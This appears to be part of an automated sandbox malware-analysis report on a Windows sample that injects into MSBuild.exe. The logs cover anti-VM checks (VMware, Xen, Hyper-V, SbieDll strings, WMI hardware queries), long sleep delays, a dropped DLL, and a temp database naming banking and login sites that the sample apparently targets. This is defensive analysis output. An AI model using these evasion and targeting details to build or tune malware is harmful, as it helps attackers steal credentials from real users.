                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4256, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory allocated: 13F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory allocated: 2E10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory allocated: 4E10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory allocated: 54B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory allocated: 64B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory allocated: 65E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory allocated: 75E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 12A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2CB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory allocated: 1490000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory allocated: 3230000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory allocated: 5770000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory allocated: 6770000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory allocated: 68A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory allocated: 78A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2DE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2EB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2DE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599886Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599777Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599667Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599559Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599327Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598520Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598279Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597604Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597442Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597199Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597092Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596980Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596857Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5057Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4759Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\d3d9.dllJump to dropped file
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeAPI coverage: 8.6 %
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exe TID: 6620Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 892Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599886s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599777s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599667s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599559s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599327s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599203s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -599094s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598984s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598859s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598750s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598640s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598520s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598390s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598279s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598047s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597718s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597604s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597442s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597199s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597092s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -596980s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -596857s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -596703s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -596515s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -596375s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe TID: 2792Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6532Thread sleep time: -65000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEECF58 FindFirstFileExW,0_2_6CEECF58
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4BB6C8 FindFirstFileExW,5_2_6C4BB6C8
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599886Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599777Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599667Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599559Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599327Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598520Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598279Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597604Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597442Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597199Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597092Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596980Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596857Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: discord.comVMware20,11696428655f
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: global block list test formVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: MSBuild.exe, 00000003.00000002.2354332386.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: outlook.office.comVMware20,11696428655s
